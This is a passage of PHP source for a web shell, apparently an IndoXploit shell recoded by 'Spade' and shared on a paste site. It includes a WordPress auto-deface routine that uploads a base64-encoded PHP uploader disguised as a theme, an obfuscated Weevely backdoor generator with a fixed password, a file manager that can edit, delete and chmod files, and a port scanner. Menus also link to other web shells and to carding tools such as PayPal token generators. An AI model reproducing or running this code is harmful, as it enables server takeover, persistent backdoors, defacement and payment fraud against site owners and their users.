  4969. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  4970. $www = "m.php";
  4971. $fp5 = fopen($www,"w");
  4972. fputs($fp5,$upload3);
  4973. $post2 = array(
  4974. "_wpnonce" => "$anu2",
  4975. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  4976. "themezip" => "@$www",
  4977. "install-theme-submit" => "Install Now",
  4978. );
  4979. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  4980. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  4981. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  4982. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  4983. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  4984. curl_setopt($ch, CURLOPT_POST, 1);
  4985. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  4986. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  4987. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  4988. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  4989. $data3 = curl_exec($ch);
  4990. curl_close($ch);
  4991. $y = date("Y");
  4992. $m = date("m");
  4993. $namafile = "id.php";
  4994. $fpi = fopen($namafile,"w");
  4995. fputs($fpi,$script);
  4996. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  4997. curl_setopt($ch6, CURLOPT_POST, true);
  4998. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  4999. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  5000. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  5001. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  5002. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  5003. $postResult = curl_exec($ch6);
  5004. curl_close($ch6);
  5005. $as = "$target/k.php";
  5006. $bs = anucurl($as);
  5007. if(preg_match("#$script#is", $bs)) {
  5008. echo "[+] <font color='lime'>Manage...</font><br>";
  5009. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  5010. } else {
  5011. echo "[-] <font color='red'>Error...</font><br>";
  5012. echo "[!!] Just Try Manual: <br>";
  5013. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  5014. echo "[+] username: <font color=lime>$user</font><br>";
  5015. echo "[+] password: <font color=lime>$pass</font><br><br>";
  5016. }
  5017. mysql_close($conn);
  5018. }
  5019. }
  5020. } else {
  5021. echo "<center><h1 class='titulo'>WordPress Auto Deface V.2</h1>
  5022. <form method='post'>
  5023. Link Config: <br>
  5024. <textarea name='link' placeholder='http://target.com/spade_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  5025. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Spade' required><br>
  5026. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Deface!!'>
  5027. </form></center>";
  5028. }
  5029. } elseif($_GET['act'] == 'newfile') {
  5030. if($_POST['new_save_file']) {
  5031. $newfile = htmlspecialchars($_POST['newfile']);
  5032. $fopen = fopen($newfile, "a+");
  5033. if($fopen) {
  5034. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  5035. } else {
  5036. $act = "<font color=red>permission denied</font>";
  5037. }
  5038. }
  5039. echo $act;
  5040. echo "<form method='post'>
  5041. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  5042. <input type='submit' name='new_save_file' value='Submit'>
  5043. </form>";
  5044. } elseif($_GET['act'] == 'newfolder') {
  5045. if($_POST['new_save_folder']) {
  5046. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  5047. if(!mkdir($new_folder)) {
  5048. $act = "<font color=red>permission denied</font>";
  5049. } else {
  5050. $act = "<script>window.location='?dir=".$dir."';</script>";
  5051. }
  5052. }
  5053. echo $act;
  5054. echo "<center><h1 class='titulo'>NEW FOLDER</h1></center><br>";
  5055. echo "<form method='post'>
  5056. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  5057. <input type='submit' name='new_save_folder' value='Submit'>
  5058. </form>";
  5059. } elseif($_GET['act'] == 'rename_dir') {
  5060. if($_POST['dir_rename']) {
  5061. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  5062. if($dir_rename) {
  5063. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  5064. } else {
  5065. $act = "<font color=red>permission denied</font>";
  5066. }
  5067. echo "".$act."<br>";
  5068. }
  5069. echo "<form method='post'>
  5070. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  5071. <input type='submit' name='dir_rename' value='rename'>
  5072. </form>";
  5073. }elseif($_GET['act'] == 'chmod_dir'){
  5074. if($_GET['dir']){
  5075. echo "Current Directory: <font color='lime'>" . $_GET['dir'] . "</font>";
  5076. echo "<br>The mode parameter consists of four numbers:<br>
  5077. <br>
  5078. ~The first number is always zero<br>
  5079. ~The second number specifies permissions for the owner<br>
  5080. ~The third number specifies permissions for the owner's user group<br>
  5081. ~The fourth number specifies permissions for everybody else<br>
  5082. <br>
  5083. Possible values (to set multiple permissions, add up the following numbers):<br>
  5084. <br>
  5085. 1 = execute permissions<br>
  5086. 2 = write permissions<br>
  5087. 4 = read permissions<br>
  5088. <br>
  5089. ";
  5090. echo "<form method='post'><input type='text' size='4' name='dirchmod' placeholder='".substr(sprintf('%o', fileperms($_GET['dir'])),-4)."'><input type='submit' value='set permission'></form>";
  5091. if(!empty($_POST['dirchmod'])){
  5092. $pers = 0;
  5093. for($i=strlen($_POST['dirchmod'])-1;$i>=0;--$i)
  5094. $pers += (int)$_POST['dirchmod'][$i]*pow(8, (strlen($_POST['dirchmod'])-$i-1));
  5095. if(!@chmod($_GET['file'], $pers)){
  5096. echo "<font color='red'>Cant Set Permission!</font>";
  5097. }else{
  5098. echo "Permission Set!";
  5099. }
  5100. }
  5101. }
  5102. } elseif($_GET['act'] == 'delete_dir') {
  5103. function Delete($path)
  5104. {
  5105. if (is_dir($path) === true)
  5106. {
  5107. $files = array_diff(scandir($path), array('.', '..'));
  5108. foreach ($files as $file)
  5109. {
  5110. Delete(realpath($path) . '/' . $file);
  5111. }
  5112. return rmdir($path);
  5113. }
  5114. else if (is_file($path) === true)
  5115. {
  5116. return unlink($path);
  5117. }
  5118. return false;
  5119. }
  5120. $delete_dir = Delete($dir);
  5121. if($delete_dir) {
  5122. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  5123. } else {
  5124. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  5125. }
  5126. echo $act;
  5127. } elseif($_GET['act'] == 'view') {
  5128. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ]<br>";
  5129. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  5130. } elseif($_GET['act'] == 'edit') {
  5131. if($_POST['save']) {
  5132. $save = file_put_contents($_GET['file'], $_POST['src']);
  5133. if($save) {
  5134. $act = "<font color=lime>Saved!</font>";
  5135. } else {
  5136. $act = "<font color=red>permission denied</font>";
  5137. }
  5138. echo "".$act."<br>";
  5139. }
  5140. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ]<br>";
  5141. echo "<form method='post'>
  5142. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  5143. <input type='submit' value='Save' name='save' style='width: 500px;'>
  5144. </form>";
  5145. } elseif($_GET['act'] == 'rename') {
  5146. if($_POST['do_rename']) {
  5147. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  5148. if($rename) {
  5149. $act = "<script>window.location='?dir=".$dir."';</script>";
  5150. } else {
  5151. $act = "<font color=red>permission denied</font>";
  5152. }
  5153. echo "".$act."<br>";
  5154. }
  5155. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ]<br>";
  5156. echo "<form method='post'>
  5157. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  5158. <input type='submit' name='do_rename' value='rename'>
  5159. </form>";
  5160. } elseif($_GET['act'] == 'chmod'){
  5161. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'><b>chmod</b></a> ]<br>";
  5162.  
  5163. echo "<br>The mode parameter consists of four numbers:<br>
  5164. <br>
  5165. ~The first number is always zero<br>
  5166. ~The second number specifies permissions for the owner<br>
  5167. ~The third number specifies permissions for the owner's user group<br>
  5168. ~The fourth number specifies permissions for everybody else<br>
  5169. <br>
  5170. Possible values (to set multiple permissions, add up the following numbers):<br>
  5171. <br>
  5172. 1 = execute permissions<br>
  5173. 2 = write permissions<br>
  5174. 4 = read permissions<br>
  5175. <br>
  5176. ";
  5177. echo "<form method='post'><input type='text' size='4' name='filechmod' placeholder='".substr(sprintf('%o', fileperms($_GET['file'])),-4)."'><input type='submit' value='set permission'></form>";
  5178.  
  5179. if(!empty($_POST['filechmod'])){
  5180. $pems = 0;
  5181. for($i=strlen($_POST['filechmod'])-1;$i>=0;--$i)
  5182. $pems += (int)$_POST['filechmod'][$i]*pow(8, (strlen($_POST['filechmod'])-$i-1));
  5183. if(!@chmod($_GET['file'], $pems)){
  5184. echo "<font color='red'>Cant Set Permission!</font>";
  5185. }else{
  5186. echo "Permission Set!";
  5187. }
  5188. }
  5189.  
  5190. } elseif($_GET['act'] == 'delete') {
  5191. $delete = unlink($_GET['file']);
  5192. if($delete) {
  5193. $act = "<script>window.location='?dir=".$dir."';</script>";
  5194. } else {
  5195. $act = "<font color=red>permission denied</font>";
  5196. }
  5197. echo $act;
  5198. }elseif($_GET['do'] == 'backconnect'){
  5199. echo "<center><h1 class='titulo'>Weevely Back Connect</h1><br><p1>Note: <a href='https://github.com/epinna/weevely3'><font color=lime>weevely</font></a> needs here :)</p1><br><form method='post'><input type='submit' name='weevely' value='Launch Weevely Shell'></form><br><br><p1>Password is 'azazel'</p1></center>";
  5200. if(isset($_POST['weevely'])){
  5201. $weevely = base64_decode('PD9waHAKJEs9JyhbYDJcXGRdKSk/LD8vYDIiLCRyYSxgMiRtKTtpYDJmYDIoJHEmJiRgMm0pe0BzZXNzaW9uX3N0YDJhcnQoKTskYDJzPSYkYDJfYDJTRVNTSU9OO2AyJHNzPSJgMnN1YnN0ciI7YDIkc2w9ImAnOwokVT0nWyRgMmAyaV09IiJgMjskYDJgMnA9JHNzKCRwLDMpO31pZihhcnJheV9rZXlgMl9leGlgMnN0cygkaSwkYDJzKSl7YDJgMiRzYDJbJGldLj0kcDskZT1zdHJgMnBvcygkc1tgMiRpXSwkZik7YDJpZigkZWAnOwokYj0nbGVhbigpOyRkPWJhc2U2YDI0X2VuY2AyYDJvZGUoeChnemNvbXByZWAyc3MoJGAybyksYDIkaylgMik7cHJpbnQoIjwkaz4kZGAyYDI8LyRrPiIpO0BzZXNgMnNpYDJgMm9uX2Rlc3Ryb3koKTt9fX19JzsKJHk9JzIpe2AyJGs9YDIka2hgMi4ka2AyZjtvYl9zdGFydCgpO0BlYDJ2YDJhbChAZ3p1bmNvYDJtcHJlc3MoQGAyeChAYmFzYDJlNjRgMl9kYDJlYDJjb2RlKHByZWAyZ19yZXBsYWNlKGFycmFgMnknOwokWD1zdHJfcmVwbGFjZSgnY20nLCcnLCdjcmVjbWFjbXRlX2NtY21mY211Y21uY3Rpb24nKTsKJGQ9JzJzdHJgMnRvbG93YDJlcmAyIjskaT0kbVsxYDJdYDJbYDIwXS4kbVsxXVsxXTskaD0kc2woYDIkc3MoYDJtZDUoJGkuJGtoKWAyLDAsMylgMik7JGY9YDIkc2woJHNzKG1kYDI1KCRpLiRrYCc7CiRhPScyZmAyKWAyLGAyMCxgMjMpKTskcD0iIjtmb3IoJHo9MTskejxjb3VgMm50KCRtWzFgMl0pO2AyJHorKykkcC5gMj1gMiRxWyRtWzJdYDJbJGAyel1dO2lmYDIoc3RyYDJwb3MoYDIkcCwkaCk9PT0wKXskcyc7CiRHPSdyYDIpO3BhcnNlX3NgMnRgMnIoYDIkdWAyWyJxdWVyeSJdLCRxKTskYDJxPWFycmF5X3ZgMmFsdWVzKGAyJHEpO3ByZWAyZ19gMm1gMmF0YDJjaF9hbGwoImAyLyhbXFx3XSlbXFx3LV0rKD86O2AycWAyPTAuJzsKJHQ9JzskaTwkbGAyOyl7Zm9gMnIoYDIkaj0wOygkYDJqPCRjJiYkaTwkYDJsKTskaitgMmAyKywkaStgMispe2AyJG8uPSR0eyRpfV4ka2AyeyRqfTt9fWAycmAyZXR1cm4gJG87YDJ9YDIkcj1gMic7CiR6PScka2g9IjMwYDIwOCI7JGtmPSJgMjZjM2ZgMiI7ZnVuYDJjdGlvbiB4KCR0YDJgMiwkayl7JGM9c3RyYDJgMmAybGAyZW4oJGspOyRsPXN0cmxlbigkdCk7JG9gMj0iIjtmYDJvcigkYDJpPTAnOwokaj0nJF9TRVJWRVI7JHJgMnI9QCRyWyJIVFRQX1JgMkVGYDJFUkVgMlIiXTskcmE9QCRyWyJIYDJgMlRgMlRQX0FDQ0VQVF9MQU5HVUFHYDJFImAyXTtgMmlmKCRgMnJyJiYkcmEpeyR1PXBhcnNgMmVgMl91cmwoJHInOwokZj0nKGAyIi9fLyIsIi8tYDIvIiksYXJyYXlgMmAyKGAyIi8iLCIrIiksJHNzKCRgMnNbYDIkaV0sMCwkZSkpKSwkaykpKWAyO2AyJG9gMj1vYl9nZXRfY29udGAyZWAyYDJudHMoYDIpO29iX2VuYDJkX2MnOwokQz1zdHJfcmVwbGFjZSgnYDInLCcnLCR6LiR0LiRqLiRHLiRLLiRkLiRhLiRVLiR5LiRmLiRiKTsKJHE9JFgoJycsJEMpOyRxKCk7Cj8+');
  5202. $pwn = fopen($GLOBALS['cwd']."weevely.php", "w");
  5203. $puke = fwrite($pwn, $weevely); if(!$puke){ echo "<br><font color=red>Unable to Generate weevely.php</font>";}else{ echo "<br><font color=lime>weevely.php Generated Successfully!</font>";}
  5204. fclose($pwn);
  5205. echo "<center>Command example:: <font color='red'><i>weevely http://ww.site_name.com/weevely.php azazel</i></font></center>";
  5206. }
  5207. }elseif ($_GET['do'] == 'port-scan') {
  5208. echo '<form action="" method="post"><center><h1 class="titulo">PORT SCAN</h1><br>';
  5209. $start = strip_tags($_POST['start']);
  5210. $end = strip_tags($_POST['end']);
  5211. $host = strip_tags($_POST['host']);
  5212. if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) {
  5213. for ($i = $start;$i <= $end;$i++) {
  5214. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  5215. if ($fp) {
  5216. echo 'Port ' . $i . ' is <font color=lime>open</font><br>';
  5217. }
  5218. flush();
  5219. }
  5220. } else {
  5221. echo '<table class=tabnet style="width:300px;padding:0 1px;">
  5222. <tr>
  5223. <td>Host</td>
  5224. <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="host" value="'.gethostbyname($_SERVER['HTTP_HOST']).'"/></td>
  5225. </tr>
  5226. <tr>
  5227. <td>Port start</td>
  5228. <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="start" value="0"/></td>
  5229. </tr>
  5230. <tr><td>Port end</td>
  5231. <td><input type="text" class="inputz" style="width:220px;color:#FF0000;" name="end" value="5000"/></td>
  5232. </tr><td><input class="inputzbut" type="submit" style="color:#FF0000" value="Scan Ports" />
  5233. </td></form></center></table>';
  5234. }
  5235. } elseif($_GET['do'] == 'kill'){
  5236. echo "<center><h1 class='titulo'>You Really Want to Kill Me?</h1></br><hr width='40%'><br><form method='post'><input type='submit' value='Yes, Of Course!' name='paktay'></form></center>";
  5237.  
  5238. if(isset($_POST['paktay'])){
  5239. if(@unlink(SELF_PATH))
  5240. die('<script>alert("Adios MotherFucker! \n Accept the Consequences for \n Deleting me!")</script><meta http-equiv="refresh" content="0; URL=https://beeg.com/">');
  5241. else
  5242. echo 'Still Alive!';
  5243. }
  5244. }else{
  5245. if(is_dir($dir) == true) {
  5246. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  5247. <tr>
  5248. <th class="th_home" id="tangina"><center>Name</center></th>
  5249. <th class="th_home" id="tangina"><center>Type</center></th>
  5250. <th class="th_home" id="tangina"><center>Size</center></th>
  5251. <th class="th_home" id="tangina"><center>Last Modified</center></th>
  5252. <th class="th_home" id="tangina"><center>Permission</center></th>
  5253. <th class="th_home" id="tangina"><center>Action</center></th>
  5254. </tr>';
  5255. $scandir = scandir($dir);
  5256. foreach($scandir as $dirx) {
  5257. $dtype = filetype("$dir/$dirx");
  5258. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  5259. if(!is_dir("$dir/$dirx")) continue;
  5260. if($dirx === '..') {
  5261. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  5262. } elseif($dirx === '.') {
  5263. $href = "<a href='?dir=$dir'>$dirx</a>";
  5264. } else {
  5265. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  5266. }
  5267. if($dirx === '.' || $dirx === '..') {
  5268. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  5269. } else {
  5270. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  5271. }
  5272. echo "<tr>";
  5273. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  5274. echo "<td class='td_home'><center>$dtype</center></td>";
  5275. echo "<td class='td_home'><center>-</center></th>";
  5276. echo "<td class='td_home'><center>$dtime</center></td>";
  5277. echo "<td class='td_home'><center><a href='?act=chmod_dir&dir=$dir/$dirx'>".w("$dir/$dirx",perms("$dir/$dirx"))."</a></center></td>";
  5278. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  5279. }
  5280. echo "</tr>";
  5281. foreach($scandir as $file) {
  5282. $ftype = filetype("$dir/$file");
  5283. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  5284. $size = filesize("$dir/$file")/1024;
  5285. $size = round($size,3);
  5286. if($size > 1024) {
  5287. $size = round($size/1024,2). 'MB';
  5288. } else {
  5289. $size = $size. 'KB';
  5290. }
  5291. if(!is_file("$dir/$file")) continue;
  5292. echo "<tr>";
  5293. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  5294. echo "<td class='td_home'><center>$ftype</center></td>";
  5295. echo "<td class='td_home'><center>$size</center></td>";
  5296. echo "<td class='td_home'><center>$ftime</center></td>";
  5297. echo "<td class='td_home'><center><a href='?act=chmod&dir=$dir&file=$dir/$file'>".w("$dir/$file",perms("$dir/$file"))."</a></center></td>";
  5298. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>chmod</a></td>";
  5299. }
  5300. echo "</tr></table>";
  5301. } else {
  5302. echo "<font color=red>can't open directory</font>";
  5303. }
  5304. }
  5305. echo "<hr><center><form>
  5306. <select onchange='if (this.value) window.open(this.value);'>
  5307. <option selected='selected' value=''> Tools Creator </option>
  5308. <option value='$ling=wso'>WSO 2.8.1</option>
  5309. <option value='$ling=injection'>1n73ction v3</option>
  5310. <option value='$ling=wk'>WHMCS Killer</option>
  5311. <option value='$ling=adminer'>Adminer</option>
  5312. <option value='$ling=b374k'>b374k Shell</option>
  5313. <option value='$ling=b374k323'>b374k 3.2</option>
  5314. <option value='$ling=bh'>BlackHat Shell</option>
  5315. <option value='$ling=dhanus'>Dhanush Shell</option>
  5316. <option value='$ling=r57'>R57 Shell</option>
  5317. <option value='$ling=encodedecode'>Encode Decode</option>
  5318. <option value='$ling=r57'>R57 Shell</option>
  5319. <option value='$ling=bypasssym'>Bypass Sym with Zip File</option>
  5320. </select>
  5321. <select onchange='if (this.value) window.open(this.value);'>
  5322. <option selected='selected' value=''> Tools Carder </option>
  5323. <option value='$ling=extractor'>DB Email Extractor</option>
  5324. <option value='$ling=promailerv2'>Pro Mailer V2</option>
  5325. <option value='$ling=bukalapak'>BukaLapak Checker</option>
  5326. <option value='$ling=tokopedia'>TokoPedia Checker</option>
  5327. <option value='$ling=tokenpp'>Paypal Token Generator</option>
  5328. <option value='$ling=mailer'>Mailer</option>
  5329. <option value='$ling=gamestopceker'>GamesTop Checker</option>
  5330. </select>
  5331. <noscript><input type='submit' value='Submit'></noscript>
  5332. </form><br/>Copyright &copy; ".date("Y")." - <a href='http://forum.indoxploit.or.id/' target='_blank'><font color=lime>IndoXploit</font></a> Shell Recoded By <a href='http://fb.com/Meowertsz' target='_BLANK'><font color=lime>Spade</a></font></center><noscript><meta http-equiv='refresh' content='0; URL=https://beeg.com/'></noscript></center></html>";
  5333. ?>
  5334. </html>
Add Comment
Please, Sign In to add comment